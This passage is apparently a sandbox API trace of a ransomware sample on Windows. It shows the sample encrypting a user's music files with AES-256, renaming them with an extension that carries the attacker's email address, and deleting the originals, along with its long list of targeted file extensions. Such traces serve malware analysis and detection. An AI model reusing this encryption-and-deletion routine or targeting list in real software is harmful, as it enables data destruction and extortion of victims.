	[0191.734] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.748] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xbde0, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xbde0, lpOverlapped=0x0) returned 1
	[0191.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.751] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb880) returned 1
	[0191.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.755] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0191.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.755] CryptHashData (hHash=0xfb9230, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.755] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9230, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb93f0) returned 1
	[0191.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.755] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xbde0, dwBufLen=0xbde0 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xbdf0) returned 1
	[0191.757] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.757] RtlMoveMemory (in: Destination=0xfe8f68, Source=0xfdd180, Length=0xbde0 | out: Destination=0xfe8f68) 
	[0191.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.758] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe8f68*, pdwDataLen=0x18a1ec*=0xbde0, dwBufLen=0xbdf0 | out: pbData=0xfe8f68*, pdwDataLen=0x18a1ec*=0xbdf0) returned 1
	[0191.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.760] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0191.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.760] CryptDestroyHash (hHash=0xfb9230) returned 1
	[0191.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.760] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0191.760] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.761] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.761] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0191.762] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 113
	[0191.763] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0191.763] WriteFile (in: hFile=0x390, lpBuffer=0xfe8f68*, nNumberOfBytesToWrite=0xbdf0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe8f68*, lpNumberOfBytesWritten=0x18a648*=0xbdf0, lpOverlapped=0x0) returned 1
	[0191.768] CloseHandle (hObject=0x390) returned 1
	[0191.769] CloseHandle (hObject=0x388) returned 1
	[0191.769] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav")) returned 1
	[0191.777] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav")) returned 0
	[0191.777] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3558650, ftCreationTime.dwHighDateTime=0x1d96d9f, ftLastAccessTime.dwLowDateTime=0x839c8850, ftLastAccessTime.dwHighDateTime=0x1d97480, ftLastWriteTime.dwLowDateTime=0x839c8850, ftLastWriteTime.dwHighDateTime=0x1d97480, nFileSizeHigh=0x0, nFileSizeLow=0x7905, dwReserved0=0x0, dwReserved1=0x0, cFileName="KEXA.mp3", cAlternateFileName="")) returned 1
	[0191.778] lstrcmpW (lpString1="KEXA.mp3", lpString2="..") returned 1
	[0191.778] lstrcmpW (lpString1="KEXA.mp3", lpString2=".") returned 1
	[0191.778] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.778] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="KEXA.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\KEXA.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\KEXA.mp3"
	[0191.778] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\KEXA.mp3") returned 59
	[0191.778] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.778] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\KEXA.mp3", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3") returned 0x3b
	[0191.778] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.779] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.779] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3"
	[0191.779] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3") returned 59
	[0191.779] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.779] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0191.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.780] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.780] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.780] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.780] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.785] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7905, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x7905, lpOverlapped=0x0) returned 1
	[0191.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.788] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb088) returned 1
	[0191.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.791] CryptCreateHash (in: hProv=0xfcb088, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0191.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.791] CryptHashData (hHash=0xfb90f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.792] CryptDeriveKey (in: hProv=0xfcb088, Algid=0x6610, hBaseData=0xfb90f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb93b0) returned 1
	[0191.792] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.792] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x7905, dwBufLen=0x7905 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x7910) returned 1
	[0191.793] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.793] RtlMoveMemory (in: Destination=0xfe4a90, Source=0xfdd180, Length=0x7905 | out: Destination=0xfe4a90) 
	[0191.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.793] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4a90*, pdwDataLen=0x18a1ec*=0x7905, dwBufLen=0x7910 | out: pbData=0xfe4a90*, pdwDataLen=0x18a1ec*=0x7910) returned 1
	[0191.796] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.796] CryptDestroyKey (hKey=0xfb93b0) returned 1
	[0191.796] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.796] CryptDestroyHash (hHash=0xfb90f0) returned 1
	[0191.796] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.797] CryptReleaseContext (hProv=0xfcb088, dwFlags=0x0) returned 1
	[0191.797] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.797] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.798] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0191.799] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0191.799] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0191.801] WriteFile (in: hFile=0x390, lpBuffer=0xfe4a90*, nNumberOfBytesToWrite=0x7910, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe4a90*, lpNumberOfBytesWritten=0x18a648*=0x7910, lpOverlapped=0x0) returned 1
	[0191.805] CloseHandle (hObject=0x390) returned 1
	[0191.805] CloseHandle (hObject=0x388) returned 1
	[0191.805] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3")) returned 1
	[0191.813] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\kexa.mp3")) returned 0
	[0191.813] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e1a530, ftCreationTime.dwHighDateTime=0x1d96de9, ftLastAccessTime.dwLowDateTime=0x4bf55aa0, ftLastAccessTime.dwHighDateTime=0x1d96e75, ftLastWriteTime.dwLowDateTime=0x4bf55aa0, ftLastWriteTime.dwHighDateTime=0x1d96e75, nFileSizeHigh=0x0, nFileSizeLow=0xe035, dwReserved0=0x0, dwReserved1=0x0, cFileName="tkwW00x4Od.mp3", cAlternateFileName="TKWW00~1.MP3")) returned 1
	[0191.813] lstrcmpW (lpString1="tkwW00x4Od.mp3", lpString2="..") returned 1
	[0191.813] lstrcmpW (lpString1="tkwW00x4Od.mp3", lpString2=".") returned 1
	[0191.813] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.813] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="tkwW00x4Od.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\tkwW00x4Od.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\tkwW00x4Od.mp3"
	[0191.814] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\tkwW00x4Od.mp3") returned 65
	[0191.814] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.814] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\tkwW00x4Od.mp3", cchLength=0x41 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3") returned 0x41
	[0191.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.814] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.814] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3"
	[0191.814] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3") returned 65
	[0191.814] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.835] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0191.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.835] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.